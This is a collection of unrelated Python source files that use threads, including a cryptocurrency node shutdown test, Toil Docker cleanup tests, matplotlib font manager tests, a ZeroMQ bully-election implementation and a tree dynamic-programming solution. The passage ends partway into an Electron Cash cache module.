# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test monicoind shutdown."""
from test_framework.test_framework import MonicoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(MonicoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.supports_cli = False
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
self.wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
test_stim_client_server.py
|
import threading
import time
from ...externals.six.moves import queue
from mne.realtime import StimServer, StimClient
from nose.tools import assert_equal, assert_raises
def test_connection():
"""Test TCP/IP connection for StimServer <-> StimClient.
"""
# have to start a thread to simulate the effect of two
# different computers since stim_server.start() is designed to
# be a blocking method
# use separate queues because timing matters
trig_queue1 = queue.Queue()
trig_queue2 = queue.Queue()
# start a thread to emulate 1st client
thread1 = threading.Thread(target=connect_client, args=(trig_queue1,))
thread1.daemon = True
# start another thread to emulate 2nd client
thread2 = threading.Thread(target=connect_client, args=(trig_queue2,))
thread2.daemon = True
with StimServer('localhost', port=4218, n_clients=2) as stim_server:
thread1.start()
thread2.start()
stim_server.start(timeout=1.0) # don't allow test to hang
# Add the trigger to the queue for both clients
stim_server.add_trigger(20)
# the assert_equal must be in the test_connection() method
# Hence communication between threads is necessary
trig1 = trig_queue1.get(timeout=1.0)
trig2 = trig_queue2.get(timeout=1.0)
assert_equal(trig1, 20)
# test if both clients receive the same trigger
assert_equal(trig1, trig2)
# test timeout for stim_server
with StimServer('localhost', port=4218) as stim_server:
assert_raises(StopIteration, stim_server.start, 0.1)
def connect_client(trig_queue):
"""Helper method that instantiates the StimClient.
"""
# just wait till the main thread reaches stim_server.start()
time.sleep(0.2)
# instantiate StimClient
stim_client = StimClient('localhost', port=4218)
# wait a bit more for script to reach stim_server.add_trigger()
time.sleep(0.2)
trig_queue.put(stim_client.get_trigger())
|
dockerTest.py
|
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import logging
import signal
import time
import os
import sys
import uuid
import docker
from threading import Thread
from docker.errors import ContainerError
from toil.job import Job
from toil.leader import FailedJobsException
from toil.test import ToilTest, slow, needs_docker
from toil.lib.docker import apiDockerCall, containerIsRunning, dockerKill
from toil.lib.docker import FORGO, STOP, RM
logger = logging.getLogger(__name__)
@needs_docker
class DockerTest(ToilTest):
"""
Tests dockerCall and ensures no containers are left around.
When running tests you may optionally set the TOIL_TEST_TEMP environment
    variable to the path of a directory where you want temporary test files to be
placed. The directory will be created if it doesn't exist. The path may be
relative in which case it will be assumed to be relative to the project
root. If TOIL_TEST_TEMP is not defined, temporary files and directories will
be created in the system's default location for such files and any temporary
    files or directories left over from tests will be removed automatically
    during tear down.
Otherwise, left-over files will not be removed.
"""
def setUp(self):
self.tempDir = self._createTempDir(purpose='tempDir')
self.dockerTestLogLevel = 'INFO'
def testDockerClean(self,
disableCaching=True,
detached=True,
rm=True,
deferParam=None):
"""
Run the test container that creates a file in the work dir, and sleeps
for 5 minutes.
Ensure that the calling job gets SIGKILLed after a minute, leaving
behind the spooky/ghost/zombie container. Ensure that the container is
killed on batch system shutdown (through the deferParam mechanism).
"""
# We need to test the behaviour of `deferParam` with `rm` and
# `detached`. We do not look at the case where `rm` and `detached` are
# both True. This is the truth table for the different combinations at
# the end of the test. R = Running, X = Does not exist, E = Exists but
# not running.
        #               None    FORGO   STOP    RM
        #   rm           X        R      X      X
        #   detached     R        R      E      X
        #   Neither      R        R      E      X
data_dir = os.path.join(self.tempDir, 'data')
working_dir = os.path.join(self.tempDir, 'working')
test_file = os.path.join(working_dir, 'test.txt')
os.makedirs(data_dir, exist_ok=True)
os.makedirs(working_dir, exist_ok=True)
options = Job.Runner.getDefaultOptions(os.path.join(self.tempDir,
'jobstore'))
options.logLevel = self.dockerTestLogLevel
options.workDir = working_dir
options.clean = 'always'
options.disableCaching = disableCaching
# No base64 logic since it might create a name starting with a `-`.
container_name = uuid.uuid4().hex
A = Job.wrapJobFn(_testDockerCleanFn,
working_dir,
detached,
rm,
deferParam,
container_name)
try:
Job.Runner.startToil(A, options)
except FailedJobsException:
# The file created by spooky_container would remain in the directory
# and since it was created inside the container, it would have had
# uid and gid == 0 (root) which may cause problems when docker
# attempts to clean up the jobstore.
file_stats = os.stat(test_file)
assert file_stats.st_gid != 0
assert file_stats.st_uid != 0
if (rm and (deferParam != FORGO)) or deferParam == RM:
# These containers should not exist
assert containerIsRunning(container_name) is None, \
'Container was not removed.'
elif deferParam == STOP:
# These containers should exist but be non-running
assert containerIsRunning(container_name) == False, \
'Container was not stopped.'
else:
# These containers will be running
assert containerIsRunning(container_name) == True, \
'Container was not running.'
client = docker.from_env(version='auto')
dockerKill(container_name, client)
try:
os.remove(test_file)
except:
pass
def testDockerClean_CRx_FORGO(self):
self.testDockerClean(disableCaching=True, detached=False, rm=True,
deferParam=FORGO)
def testDockerClean_CRx_STOP(self):
self.testDockerClean(disableCaching=True, detached=False, rm=True,
deferParam=STOP)
def testDockerClean_CRx_RM(self):
self.testDockerClean(disableCaching=True, detached=False, rm=True,
deferParam=RM)
@slow
def testDockerClean_CRx_None(self):
self.testDockerClean(disableCaching=True, detached=False, rm=True,
deferParam=None)
@slow
def testDockerClean_CxD_FORGO(self):
self.testDockerClean(disableCaching=True, detached=True, rm=False,
deferParam=FORGO)
@slow
def testDockerClean_CxD_STOP(self):
self.testDockerClean(disableCaching=True, detached=True, rm=False,
deferParam=STOP)
@slow
def testDockerClean_CxD_RM(self):
self.testDockerClean(disableCaching=True, detached=True, rm=False,
deferParam=RM)
@slow
def testDockerClean_CxD_None(self):
self.testDockerClean(disableCaching=True, detached=True, rm=False,
deferParam=None)
@slow
def testDockerClean_Cxx_FORGO(self):
self.testDockerClean(disableCaching=True, detached=False, rm=False,
deferParam=FORGO)
@slow
def testDockerClean_Cxx_STOP(self):
self.testDockerClean(disableCaching=True, detached=False, rm=False,
deferParam=STOP)
@slow
def testDockerClean_Cxx_RM(self):
self.testDockerClean(disableCaching=True, detached=False, rm=False,
deferParam=RM)
@slow
def testDockerClean_Cxx_None(self):
self.testDockerClean(disableCaching=True, detached=False, rm=False,
deferParam=None)
@slow
def testDockerClean_xRx_FORGO(self):
self.testDockerClean(disableCaching=False, detached=False, rm=True,
deferParam=FORGO)
@slow
def testDockerClean_xRx_STOP(self):
self.testDockerClean(disableCaching=False, detached=False, rm=True,
deferParam=STOP)
@slow
def testDockerClean_xRx_RM(self):
self.testDockerClean(disableCaching=False, detached=False, rm=True,
deferParam=RM)
@slow
def testDockerClean_xRx_None(self):
self.testDockerClean(disableCaching=False, detached=False, rm=True,
deferParam=None)
@slow
def testDockerClean_xxD_FORGO(self):
self.testDockerClean(disableCaching=False, detached=True, rm=False,
deferParam=FORGO)
@slow
def testDockerClean_xxD_STOP(self):
self.testDockerClean(disableCaching=False, detached=True, rm=False,
deferParam=STOP)
@slow
def testDockerClean_xxD_RM(self):
self.testDockerClean(disableCaching=False, detached=True, rm=False,
deferParam=RM)
@slow
def testDockerClean_xxD_None(self):
self.testDockerClean(disableCaching=False, detached=True, rm=False,
deferParam=None)
@slow
def testDockerClean_xxx_FORGO(self):
self.testDockerClean(disableCaching=False, detached=False, rm=False,
deferParam=FORGO)
@slow
def testDockerClean_xxx_STOP(self):
self.testDockerClean(disableCaching=False, detached=False, rm=False,
deferParam=STOP)
@slow
def testDockerClean_xxx_RM(self):
self.testDockerClean(disableCaching=False, detached=False, rm=False,
deferParam=RM)
@slow
def testDockerClean_xxx_None(self):
self.testDockerClean(disableCaching=False, detached=False, rm=False,
deferParam=None)
def testDockerPipeChain(self, disableCaching=True):
"""
        Test for piping API for dockerCall(). Using this API (activated when a
        list of argument lists is given as parameters), commands are piped
together into a chain.
ex: parameters=[ ['printf', 'x\n y\n'], ['wc', '-l'] ] should execute:
printf 'x\n y\n' | wc -l
"""
options = Job.Runner.getDefaultOptions(os.path.join(self.tempDir, 'jobstore'))
options.logLevel = self.dockerTestLogLevel
options.workDir = self.tempDir
options.clean = 'always'
options.caching = disableCaching
A = Job.wrapJobFn(_testDockerPipeChainFn)
rv = Job.Runner.startToil(A, options)
logger.info('Container pipeline result: %s', repr(rv))
if sys.version_info >= (3, 0):
rv = rv.decode('utf-8')
assert rv.strip() == '2'
def testDockerPipeChainErrorDetection(self, disableCaching=True):
"""
By default, executing cmd1 | cmd2 | ... | cmdN, will only return an
        error if cmdN fails. This can lead to all manner of errors being
silently missed. This tests to make sure that the piping API for
dockerCall() throws an exception if non-last commands in the chain fail.
"""
options = Job.Runner.getDefaultOptions(os.path.join(self.tempDir,
'jobstore'))
options.logLevel = self.dockerTestLogLevel
options.workDir = self.tempDir
options.clean = 'always'
options.caching = disableCaching
A = Job.wrapJobFn(_testDockerPipeChainErrorFn)
rv = Job.Runner.startToil(A, options)
assert rv == True
def testNonCachingDockerChain(self):
self.testDockerPipeChain(disableCaching=False)
def testNonCachingDockerChainErrorDetection(self):
self.testDockerPipeChainErrorDetection(disableCaching=False)
def _testDockerCleanFn(job,
working_dir,
detached=None,
rm=None,
deferParam=None,
containerName=None):
"""
Test function for test docker_clean. Runs a container with given flags and
then dies leaving behind a zombie container.
:param toil.job.Job job: job
:param working_dir: See `work_dir=` in :func:`dockerCall`
:param bool rm: See `rm=` in :func:`dockerCall`
:param bool detached: See `detached=` in :func:`dockerCall`
:param int deferParam: See `deferParam=` in :func:`dockerCall`
:param str containerName: See `container_name=` in :func:`dockerCall`
"""
def killSelf():
test_file = os.path.join(working_dir, 'test.txt')
# Kill the worker once we are sure the docker container is started
while not os.path.exists(test_file):
logger.debug('Waiting on the file created by spooky_container.')
time.sleep(1)
# By the time we reach here, we are sure the container is running.
time.sleep(1)
os.kill(os.getpid(), signal.SIGKILL)
t = Thread(target=killSelf)
# Make it a daemon thread so that thread failure doesn't hang tests.
t.daemon = True
t.start()
apiDockerCall(job,
image='quay.io/ucsc_cgl/spooky_test',
working_dir=working_dir,
deferParam=deferParam,
containerName=containerName,
detach=detached,
remove=rm,
privileged=True)
def _testDockerPipeChainFn(job):
"""Return the result of a simple pipe chain. Should be 2."""
parameters = [['printf', 'x\n y\n'], ['wc', '-l']]
return apiDockerCall(job,
image='ubuntu:latest',
parameters=parameters,
privileged=True)
def _testDockerPipeChainErrorFn(job):
"""Return True if the command exit 1 | wc -l raises a ContainerError."""
parameters = [ ['exit', '1'], ['wc', '-l'] ]
try:
apiDockerCall(job,
image='quay.io/ucsc_cgl/spooky_test',
parameters=parameters)
except ContainerError:
return True
return False
|
synthesize.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Synthesize waveform using converted features.
# By Wen-Chin Huang 2019.06
import json
import os
import tensorflow as tf
import numpy as np
from datetime import datetime
from importlib import import_module
import pysptk
import pyworld as pw
from scipy.io import loadmat, savemat
from scipy.io import wavfile
import argparse
import logging
import multiprocessing as mp
import sys
from preprocessing.vcc2018.feature_reader import Whole_feature_reader
from util.synthesizer import world_synthesis
from util.misc import read_hdf5
from util.postfilter import fast_MLGV
from util.f0transformation import log_linear_transformation
def read_and_synthesize(file_list, arch, stats, input_feat, output_feat):
for i, (bin_path, feat_path) in enumerate(file_list):
input_feat_dim = arch['feat_param']['dim'][input_feat]
# define paths
output_dir = os.path.dirname(bin_path).replace('converted-' + output_feat, 'converted-wav')
basename = os.path.splitext(os.path.split(bin_path)[-1])[0]
wav_name = os.path.join(output_dir, basename + '.wav')
gv_wav_name = os.path.join(output_dir, basename + '-gv.wav')
# read source features and converted spectral features
src_data = Whole_feature_reader(feat_path, arch['feat_param'])
cvt = np.fromfile(bin_path, dtype = np.float32).reshape([-1, input_feat_dim])
# f0 conversion
lf0 = log_linear_transformation(src_data['f0'], stats)
# apply gv post filtering to converted
cvt_gv = fast_MLGV(cvt, stats['gv_t'])
# energy compensation
if output_feat == 'mcc':
en_cvt = np.c_[src_data['en_mcc'], cvt]
en_cvt_gv = np.c_[src_data['en_mcc'], cvt_gv]
elif output_feat == 'sp':
cvt = np.power(10., cvt)
en_cvt = np.expand_dims(src_data['en_sp'], 1) * cvt
cvt_gv = np.power(10., cvt_gv)
en_cvt_gv = np.expand_dims(src_data['en_sp'], 1) * cvt_gv
# synthesis
world_synthesis(wav_name, arch['feat_param'],
lf0.astype(np.float64).copy(order='C'),
src_data['ap'].astype(np.float64).copy(order='C'),
en_cvt.astype(np.float64).copy(order='C'),
output_feat)
world_synthesis(gv_wav_name, arch['feat_param'],
lf0.astype(np.float64).copy(order='C'),
src_data['ap'].astype(np.float64).copy(order='C'),
en_cvt_gv.astype(np.float64).copy(order='C'),
output_feat)
def main():
parser = argparse.ArgumentParser(
description="synthesize waveforms using converted files.")
parser.add_argument(
"--logdir", required=True, type=str,
help="path of log directory")
parser.add_argument(
"--type", default='test', type=str,
help="test or valid (default is test)")
parser.add_argument(
"--input_feat", required=True,
type=str, help="input feature type")
parser.add_argument(
"--output_feat", required=True,
type=str, help="output feature type")
parser.add_argument(
"--n_jobs", default=12,
type=int, help="number of parallel jobs")
args = parser.parse_args()
# set log level
fmt = '%(asctime)s %(message)s'
datefmt = '%m/%d/%Y %I:%M:%S'
logFormatter = logging.Formatter(fmt, datefmt=datefmt)
logging.basicConfig(
level=logging.INFO,
filename=os.path.join(args.logdir, 'exp.log'),
format=fmt,
datefmt=datefmt,
)
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
logging.getLogger().addHandler(consoleHandler)
logging.info('====================')
logging.info('Synthesize start')
logging.info(args)
train_dir = os.sep.join(os.path.normpath(args.logdir).split(os.sep)[:-1])
output_dir = os.path.basename(os.path.normpath(args.logdir))
src, trg = output_dir.split('-')[-2:]
# Load architecture
arch = tf.gfile.Glob(os.path.join(train_dir, 'architecture*.json'))[0] # should only be 1 file
with open(arch) as fp:
arch = json.load(fp)
input_feat = args.input_feat
output_feat = args.output_feat
# Load statistics
stats = {
'mu_s' : read_hdf5(arch['stats'], '/f0/' + src + '/mean'),
'std_s' : read_hdf5(arch['stats'], '/f0/' + src + '/std'),
'mu_t' : read_hdf5(arch['stats'], '/f0/' + trg + '/mean'),
'std_t' : read_hdf5(arch['stats'], '/f0/' + trg + '/std'),
'gv_t' : read_hdf5(arch['stats'], '/gv_{}/'.format(output_feat) + trg),
}
# Make directory
tf.gfile.MakeDirs(os.path.join(args.logdir, 'converted-wav'))
# Get and divide list
bin_list = sorted(tf.gfile.Glob(os.path.join(args.logdir, 'converted-{}'.format(output_feat), '*.bin')))
if args.type == 'test':
feat_list = sorted(tf.gfile.Glob(arch['conversion']['test_file_pattern'].format(src)))
elif args.type == 'valid':
feat_list = []
for p in arch['training']['valid_file_pattern']:
feat_list.extend(tf.gfile.Glob(p.replace('*', src)))
feat_list = sorted(feat_list)
assert(len(bin_list) == len(feat_list))
file_list = list(zip(bin_list, feat_list))
logging.info("number of utterances = %d" % len(file_list))
file_lists = np.array_split(file_list, args.n_jobs)
file_lists = [f_list.tolist() for f_list in file_lists]
# multi processing
processes = []
for f in file_lists:
p = mp.Process(target=read_and_synthesize, args=(f, arch, stats, input_feat, output_feat))
p.start()
processes.append(p)
# wait for all process
for p in processes:
p.join()
if __name__ == '__main__':
main()
|
bully.py
|
import zmq
import time
import parse
import sys
import threading
class Bully:
def __init__(self, proc_ip, proc_port, proc_port2, id):
conf_file = open("file.config","r")
input = conf_file.readlines()
n = int(input[0])
self.processes = []
self.maxId = 0
for i in range(1,n+1):
line = parse.parse('{} {} {} {}', input[i])
self.maxId = max(self.maxId, int(line[3]))
self.processes.append({'ip': line[0], 'port': [line[1], line[2]], 'id': int(line[3])})
self.proc_ip = proc_ip
self.proc_port = proc_port
self.id = id
self.coor_id = -1
self.proc_port2 = proc_port2
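    # Assumed file.config layout (reconstructed from the parsing in __init__,
    # not from any original documentation): the first line is the number of
    # processes N, followed by N lines of
    #   "<ip> <heartbeat_port> <election_port> <id>"
    # e.g.
    #   3
    #   127.0.0.1 6000 7000 1
    #   127.0.0.1 6001 7001 2
    #   127.0.0.1 6002 7002 3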
def heart_beats(self, proc=None):
if proc == 'coor':
while int(self.coor_id) == int(self.id):
self.heart_socket.send_string('alive {} {} {}'.format(self.proc_ip, self.proc_port, self.id))
time.sleep(1)
else:
while True:
try:
coor_heart_beat = self.heart_socket2.recv_string()
req = parse.parse('alive {} {} {}', coor_heart_beat)
if int(req[2]) > self.id:
print("coordinator {}".format(coor_heart_beat))
self.update_coor(str(req[0]), str(req[1]), int(req[2]))
except:
if self.coor_id != self.id:
print("Coordinator is dead, get ready for election \n")
self.coor_id = -1
def establish_connection(self, TIMEOUT):
self.context = zmq.Context()
self.socket = self.context.socket(zmq.REP)
self.socket.bind('tcp://{}:{}'.format(self.proc_ip, self.proc_port2))
self.socket2 = self.context.socket(zmq.REQ)
self.socket2.setsockopt(zmq.RCVTIMEO, TIMEOUT)
self.connect_to_higher_ids()
self.heart_context = zmq.Context()
self.heart_socket = self.heart_context.socket(zmq.PUB)
self.heart_socket.bind('tcp://{}:{}'.format(self.proc_ip, self.proc_port))
self.heart_socket2 = self.heart_context.socket(zmq.SUB)
self.heart_socket2.setsockopt(zmq.RCVTIMEO, TIMEOUT)
self.connect_all()
self.heart_socket2.subscribe("")
def connect_all(self):
for p in self.processes:
if int(p['id']) != int(self.id):
self.heart_socket2.connect('tcp://{}:{}'.format(p['ip'], p['port'][0]))
def connect_to_higher_ids(self):
for p in self.processes:
if int(p['id']) > int(self.id):
self.socket2.connect('tcp://{}:{}'.format(p['ip'], p['port'][1]))
# so that last process does not block on send...
#self.socket2.connect('tcp://{}:{}'.format(p['ip'], 55555))
def disconnect(self):
for p in self.processes:
self.socket2.disconnect('tcp://{}:{}'.format(p['ip'], p['port'][1]))
def update_coor(self, ip, port, id):
self.coor_ip = ip
self.coor_port = port
self.coor_id = id
def declare_am_coordinator(self):
print('I am the coordinator')
self.update_coor(self.proc_ip, self.proc_port, self.id)
heart_beats_thread = threading.Thread(target=self.heart_beats, args=['coor'])
heart_beats_thread.start()
def run_client(self):
while True:
if self.coor_id == -1:
try:
if self.id == self.maxId:
self.declare_am_coordinator()
else:
self.socket2.send_string('election')
req = self.socket2.recv_string()
except:
self.declare_am_coordinator()
time.sleep(1)
def run_server(self):
while True:
request = self.socket.recv_string()
if request.startswith('election'):
#respond alive..
self.socket.send_string('alive')
def run(self):
self.establish_connection(2000)
heart_beats_thread = threading.Thread(target=self.heart_beats, args=[])
heart_beats_thread.start()
serv_thread = threading.Thread(target=self.run_server, args=[])
serv_thread.start()
client_thread = threading.Thread(target=self.run_client, args=[])
client_thread.start()
ip, port1, port2, id = str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), int(sys.argv[4])
bully = Bully(ip, port1, port2, id)
bully.run()
|
http_sensor.py
|
from threading import Thread
from time import sleep
import sys
from flask import Flask
from know.http_sensor_sim import simulate_http_sensor
from flaskstream2py.flask_request_reader import FlaskRequestReader
app = Flask(__name__)
@app.route('/', methods=['POST'])
def handle_stream():
print('received request')
reader = FlaskRequestReader()
reader.open()
try:
while True:
chk = reader.read()
print(f'chk: {str(chk)}')
except:
print('Request ended. Closing reader.')
reader.close()
return 'success'
def sensor_thread(filename=None):
sleep(2)
simulate_http_sensor(filename, 'http://127.0.0.1:5000')
if __name__ == '__main__':
print(f'sys args: {sys.argv}')
t = Thread(target=sensor_thread, args=sys.argv[1:])
t.start()
app.run()
|
pyneurocl_train.py
|
import os, sys, time, threading
microdot = False
if ( os.uname()[1] == 'raspberry' ):
try:
        from microdotphat import write_string, clear, show
microdot = True
except ImportError:
print "---> microdotphat module is not installed on your raspberry"
sys.path.append("../lib")
import pyneurocl
print "---> pyneurocl - start"
h = pyneurocl.helper(False)
def progression_worker(h):
t_progress = 0
print "---> pyneurocl - starting progression_worker"
while (t_progress < 100) :
time.sleep(1)
t_progress = h.train_progress()
if microdot:
clear()
write_string( str( t_progress ) + "%" )
show()
else:
print "--->" + str( t_progress ) + "%"
return
try:
print "---> pyneurocl - initialize"
h.init('../nets/alpr/topology-alpr-let2.txt','../nets/alpr/weights-alpr-let2.bin')
t = threading.Thread(target=progression_worker,args=(h,))
t.start()
# NOTE: python GIL is released during training so that worker thread can call h.train_progress()
print "---> pyneurocl - train 10 epochs"
h.train('../nets/alpr/training/alpr-train-let.txt',10,10)
t.join()
except Exception:
print "---> pyneurocl - uninitialize"
h.uninit()
print "---> pyneurocl - end"
|
test_font_manager.py
|
from io import BytesIO, StringIO
import multiprocessing
import os
from pathlib import Path
import shutil
import subprocess
import sys
import warnings
import numpy as np
import pytest
from matplotlib.font_manager import (
findfont, findSystemFonts, FontProperties, fontManager, json_dump,
json_load, get_font, get_fontconfig_fonts, is_opentype_cff_font,
MSUserFontDirectories, _call_fc_list)
from matplotlib import pyplot as plt, rc_context
has_fclist = shutil.which('fc-list') is not None
def test_font_priority():
with rc_context(rc={
'font.sans-serif':
['cmmi10', 'Bitstream Vera Sans']}):
font = findfont(FontProperties(family=["sans-serif"]))
assert Path(font).name == 'cmmi10.ttf'
# Smoketest get_charmap, which isn't used internally anymore
font = get_font(font)
cmap = font.get_charmap()
assert len(cmap) == 131
assert cmap[8729] == 30
def test_score_weight():
assert 0 == fontManager.score_weight("regular", "regular")
assert 0 == fontManager.score_weight("bold", "bold")
assert (0 < fontManager.score_weight(400, 400) <
fontManager.score_weight("normal", "bold"))
assert (0 < fontManager.score_weight("normal", "regular") <
fontManager.score_weight("normal", "bold"))
assert (fontManager.score_weight("normal", "regular") ==
fontManager.score_weight(400, 400))
def test_json_serialization(tmpdir):
# Can't open a NamedTemporaryFile twice on Windows, so use a temporary
# directory instead.
path = Path(tmpdir, "fontlist.json")
json_dump(fontManager, path)
copy = json_load(path)
with warnings.catch_warnings():
warnings.filterwarnings('ignore', 'findfont: Font family.*not found')
for prop in ({'family': 'STIXGeneral'},
{'family': 'Bitstream Vera Sans', 'weight': 700},
{'family': 'no such font family'}):
fp = FontProperties(**prop)
assert (fontManager.findfont(fp, rebuild_if_missing=False) ==
copy.findfont(fp, rebuild_if_missing=False))
def test_otf():
fname = '/usr/share/fonts/opentype/freefont/FreeMono.otf'
if Path(fname).exists():
assert is_opentype_cff_font(fname)
for f in fontManager.ttflist:
if 'otf' in f.fname:
with open(f.fname, 'rb') as fd:
res = fd.read(4) == b'OTTO'
assert res == is_opentype_cff_font(f.fname)
@pytest.mark.skipif(not has_fclist, reason='no fontconfig installed')
def test_get_fontconfig_fonts():
assert len(get_fontconfig_fonts()) > 1
@pytest.mark.parametrize('factor', [2, 4, 6, 8])
def test_hinting_factor(factor):
font = findfont(FontProperties(family=["sans-serif"]))
font1 = get_font(font, hinting_factor=1)
font1.clear()
font1.set_size(12, 100)
font1.set_text('abc')
expected = font1.get_width_height()
hinted_font = get_font(font, hinting_factor=factor)
hinted_font.clear()
hinted_font.set_size(12, 100)
hinted_font.set_text('abc')
# Check that hinting only changes text layout by a small (10%) amount.
np.testing.assert_allclose(hinted_font.get_width_height(), expected,
rtol=0.1)
def test_utf16m_sfnt():
try:
# seguisbi = Microsoft Segoe UI Semibold
entry = next(entry for entry in fontManager.ttflist
if Path(entry.fname).name == "seguisbi.ttf")
except StopIteration:
pytest.skip("Couldn't find font to test against.")
else:
# Check that we successfully read "semibold" from the font's sfnt table
# and set its weight accordingly.
assert entry.weight == 600
def test_find_ttc():
fp = FontProperties(family=["WenQuanYi Zen Hei"])
if Path(findfont(fp)).name != "wqy-zenhei.ttc":
pytest.skip("Font may be missing")
fig, ax = plt.subplots()
ax.text(.5, .5, "\N{KANGXI RADICAL DRAGON}", fontproperties=fp)
for fmt in ["raw", "svg", "pdf", "ps"]:
fig.savefig(BytesIO(), format=fmt)
def test_find_invalid(tmpdir):
tmp_path = Path(tmpdir)
with pytest.raises(FileNotFoundError):
get_font(tmp_path / 'non-existent-font-name.ttf')
with pytest.raises(FileNotFoundError):
get_font(str(tmp_path / 'non-existent-font-name.ttf'))
with pytest.raises(FileNotFoundError):
get_font(bytes(tmp_path / 'non-existent-font-name.ttf'))
# Not really public, but get_font doesn't expose non-filename constructor.
from matplotlib.ft2font import FT2Font
with pytest.raises(TypeError, match='path or binary-mode file'):
FT2Font(StringIO())
@pytest.mark.skipif(sys.platform != 'linux', reason='Linux only')
def test_user_fonts_linux(tmpdir, monkeypatch):
font_test_file = 'mpltest.ttf'
# Precondition: the test font should not be available
fonts = findSystemFonts()
if any(font_test_file in font for font in fonts):
pytest.skip(f'{font_test_file} already exists in system fonts')
# Prepare a temporary user font directory
user_fonts_dir = tmpdir.join('fonts')
user_fonts_dir.ensure(dir=True)
shutil.copyfile(Path(__file__).parent / font_test_file,
user_fonts_dir.join(font_test_file))
with monkeypatch.context() as m:
m.setenv('XDG_DATA_HOME', str(tmpdir))
_call_fc_list.cache_clear()
# Now, the font should be available
fonts = findSystemFonts()
assert any(font_test_file in font for font in fonts)
# Make sure the temporary directory is no longer cached.
_call_fc_list.cache_clear()
@pytest.mark.skipif(sys.platform != 'win32', reason='Windows only')
def test_user_fonts_win32():
if not (os.environ.get('APPVEYOR') or os.environ.get('TF_BUILD')):
pytest.xfail("This test should only run on CI (appveyor or azure) "
"as the developer's font directory should remain "
"unchanged.")
font_test_file = 'mpltest.ttf'
# Precondition: the test font should not be available
fonts = findSystemFonts()
if any(font_test_file in font for font in fonts):
pytest.skip(f'{font_test_file} already exists in system fonts')
user_fonts_dir = MSUserFontDirectories[0]
# Make sure that the user font directory exists (this is probably not the
# case on Windows versions < 1809)
os.makedirs(user_fonts_dir)
# Copy the test font to the user font directory
shutil.copy(Path(__file__).parent / font_test_file, user_fonts_dir)
# Now, the font should be available
fonts = findSystemFonts()
assert any(font_test_file in font for font in fonts)
def _model_handler(_):
fig, ax = plt.subplots()
fig.savefig(BytesIO(), format="pdf")
plt.close()
@pytest.mark.skipif(not hasattr(os, "register_at_fork"),
reason="Cannot register at_fork handlers")
def test_fork():
_model_handler(0) # Make sure the font cache is filled.
ctx = multiprocessing.get_context("fork")
with ctx.Pool(processes=2) as pool:
pool.map(_model_handler, range(2))
def test_missing_family(caplog):
plt.rcParams["font.sans-serif"] = ["this-font-does-not-exist"]
with caplog.at_level("WARNING"):
findfont("sans")
assert [rec.getMessage() for rec in caplog.records] == [
"findfont: Font family ['sans'] not found. "
"Falling back to DejaVu Sans.",
"findfont: Generic family 'sans' not found because none of the "
"following families were found: this-font-does-not-exist",
]
def _test_threading():
import threading
from matplotlib.ft2font import LOAD_NO_HINTING
import matplotlib.font_manager as fm
N = 10
b = threading.Barrier(N)
def bad_idea(n):
b.wait()
for j in range(100):
font = fm.get_font(fm.findfont("DejaVu Sans"))
font.set_text(str(n), 0.0, flags=LOAD_NO_HINTING)
threads = [
threading.Thread(target=bad_idea, name=f"bad_thread_{j}", args=(j,))
for j in range(N)
]
for t in threads:
t.start()
for t in threads:
t.join()
def test_fontcache_thread_safe():
pytest.importorskip('threading')
import inspect
proc = subprocess.run(
[sys.executable, "-c",
inspect.getsource(_test_threading) + '\n_test_threading()']
)
if proc.returncode:
pytest.fail("The subprocess returned with non-zero exit status "
f"{proc.returncode}.")
|
plan_party.py
|
#uses python3
import sys
import threading
# This code is used to avoid stack overflow issues
sys.setrecursionlimit(10**6) # max depth of recursion
threading.stack_size(2**26) # new thread will get stack of such size
class Vertex:
def __init__(self, weight):
self.weight = weight
self.children = []
def ReadTree():
size = int(input())
tree = [Vertex(w) for w in map(int, input().split())]
for i in range(1, size):
a, b = list(map(int, input().split()))
tree[a - 1].children.append(b - 1)
tree[b - 1].children.append(a - 1)
return tree
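# Example stdin for ReadTree() (illustrative): the vertex count, the vertex
# weights, and then size-1 undirected edges given as 1-based vertex pairs.
#   5
#   1 5 3 7 5
#   5 4
#   2 3
#   4 2
#   1 2
# For this tree the maximum total weight of an independent set is 11
# (vertices 1, 3 and 4).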
def dfs(tree, vertex, parent, D):
if D[vertex] == float('inf'):
if not tree[vertex].children:
D[vertex] = tree[vertex].weight
else:
m1 = tree[vertex].weight
for child in tree[vertex].children:
if child != parent:
for grand in tree[child].children:
if grand != vertex:
m1 += dfs(tree, grand, child, D)
m0 = 0
for child in tree[vertex].children:
if child != parent:
m0 += dfs(tree, child, vertex, D)
D[vertex] = max(m1, m0)
return D[vertex]
def MaxWeightIndependentTreeSubset(tree):
size = len(tree)
if size == 0:
return 0
D = [float('inf') for _ in range(len(tree))]
return dfs(tree, 0, -1, D)
def main():
tree = ReadTree();
weight = MaxWeightIndependentTreeSubset(tree);
print(weight)
# This is to avoid stack overflow issues
threading.Thread(target=main).start()
|
caches.py
|
#!/usr/bin/env python3
import time
import threading
import queue
import weakref
from collections import defaultdict
from electroncash.util import PrintError
class ExpiringCache:
''' A fast cache useful for storing tens of thousands of lightweight items.
Use this class to cache the results of functions or other computations
when:
1. Many identical items are repetitively created (or many duplicate
computations are repetitively performed) during normal app
